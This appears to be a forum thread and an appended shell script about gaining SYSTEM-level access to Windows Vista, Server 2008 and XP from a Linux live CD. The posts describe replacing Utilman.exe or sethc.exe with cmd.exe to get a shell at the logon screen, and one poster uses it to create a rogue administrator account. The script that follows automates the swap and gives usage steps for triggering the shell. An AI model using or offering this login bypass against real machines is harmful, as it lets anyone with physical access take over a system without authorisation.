
Gaining System-Level Access To Vista

I know that you can do it from any liveCD linux distro, though I thought it was cool that BackTrack got the publicity. Anyways, I went ahead and tried it out with my copy of Windows Server 2008 Enterprise (thanks microsoft launch tour). It worked flawlessly, and instead of running "explorer" from the Utilman.exe prompt, I ran "lusrmgr.msc" and simply added my own administrator account. I got out of utilman, clicked cancel for the Windows login, did a ctrl+alt+del and my new TEST_ADMIN account was waiting for me to log in.

I wasn't able to do anything once I ran explorer from utilman, except run firefox (from which I was able to browse the net), which I had installed previously while logged into the admin account. It was all so easy...


There's a quick script I wrote in /pentest/passwd called utilman.py

If you run that on a local Vista system, it'll detect the partition, back up utilman.exe and rename cmd.exe to Utilman.exe; it's all automated. Don't run this on a WinXP box. I sent muts an updated utilman.py that never made it onto BT3 that specifically detects only Vista; however, if you run this on XP, it'll rename the utilman.exe on XP, which doesn't work.

While you're at it...

While you're being a good little code monkey...
It can't hurt to throw in a script for XP, 2003, etc. as well. A replacement for sethc.exe (the Windows sticky keys feature) would work the same. Replace sethc.exe with cmd.exe or your choice of fun.

Bet your enterprise will be hopping on full disk encryption "solutions" [even though most of them are crippled by configuration changes the vendors should never give the end users options to cripple] to keep your friendly sticky keys from going rogue.

We live in good times, and yes, my firewire ports have rubber cement in them.....
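The swap described in the two posts above (Utilman.exe on Vista/2008, sethc.exe on XP/2003), written out as an added shell example for a Linux live CD. This is not the utilman.py from the BackTrack post, and the function names (swap_helper, restore_helper, find_system32, is_vista_or_later) are mine. It assumes the NTFS partition has already been mounted read-write (e.g. with ntfs-3g), and it uses the presence of winload.exe as the "Vista or later" test, which is an assumption on my part rather than something the thread states. It copies cmd.exe over the helper instead of renaming it, so cmd.exe itself stays intact, and it refuses to clobber an existing backup so the original can always be put back.

```shell
#!/bin/sh
# Added example: swap a logon-screen helper binary (Utilman.exe or sethc.exe)
# for cmd.exe in an offline Windows System32 directory reached from a Linux
# live CD. Not the utilman.py from the BackTrack post; helper names are mine.
set -eu

# Assumption: winload.exe exists on Vista/2008 and later, not on XP/2003.
# The thread says the Utilman swap does not work on XP, so we use this to
# refuse that combination.
is_vista_or_later() {
    [ -f "$1/winload.exe" ]
}

# find_system32 MOUNTPOINT...  -> prints the first System32 directory found.
# Assumes the partitions are already mounted read-write (ntfs-3g).
find_system32() {
    for m in "$@"; do
        for d in "$m/Windows/System32" "$m/WINDOWS/system32"; do
            if [ -d "$d" ]; then echo "$d"; return 0; fi
        done
    done
    echo "no Windows/System32 under: $*" >&2
    return 1
}

# swap_helper SYSTEM32_DIR HELPER
# Backs up HELPER to HELPER.bak (never overwriting an existing backup) and
# copies cmd.exe over HELPER. Prints the backup path on success.
swap_helper() {
    sys32=$1; helper=$2
    [ -f "$sys32/cmd.exe" ] || { echo "no cmd.exe in $sys32" >&2; return 1; }
    [ -f "$sys32/$helper" ] || { echo "no $helper in $sys32" >&2; return 1; }
    if [ -e "$sys32/$helper.bak" ]; then
        echo "$helper.bak already exists; restore it first" >&2; return 1
    fi
    if [ "$helper" = "Utilman.exe" ] && ! is_vista_or_later "$sys32"; then
        echo "Utilman swap only works on Vista/2008; use sethc.exe here" >&2
        return 1
    fi
    cp -p "$sys32/$helper" "$sys32/$helper.bak"
    cp -p "$sys32/cmd.exe" "$sys32/$helper"
    echo "$sys32/$helper.bak"
}

# restore_helper SYSTEM32_DIR HELPER  -> puts the original back, removes backup.
restore_helper() {
    sys32=$1; helper=$2
    [ -f "$sys32/$helper.bak" ] || { echo "no backup for $helper" >&2; return 1; }
    mv -f "$sys32/$helper.bak" "$sys32/$helper"
}

# make_fake_system32 ROOT vista|xp
# Constructed test fixture (not a real Windows tree): builds a minimal
# System32 so the functions above can be exercised offline.
make_fake_system32() {
    d="$1/Windows/System32"
    mkdir -p "$d"
    printf 'cmd-orig' > "$d/cmd.exe"
    printf 'utilman-orig' > "$d/Utilman.exe"
    printf 'sethc-orig' > "$d/sethc.exe"
    if [ "$2" = vista ]; then printf 'winload' > "$d/winload.exe"; fi
}
```

Usage from a live CD would be something like `sys=$(find_system32 /mnt/*) && swap_helper "$sys" Utilman.exe`, then at the logon screen click Ease of Access (Vista) or press Shift five times (XP sticky keys) to get the SYSTEM shell, and `restore_helper` afterwards to undo the change.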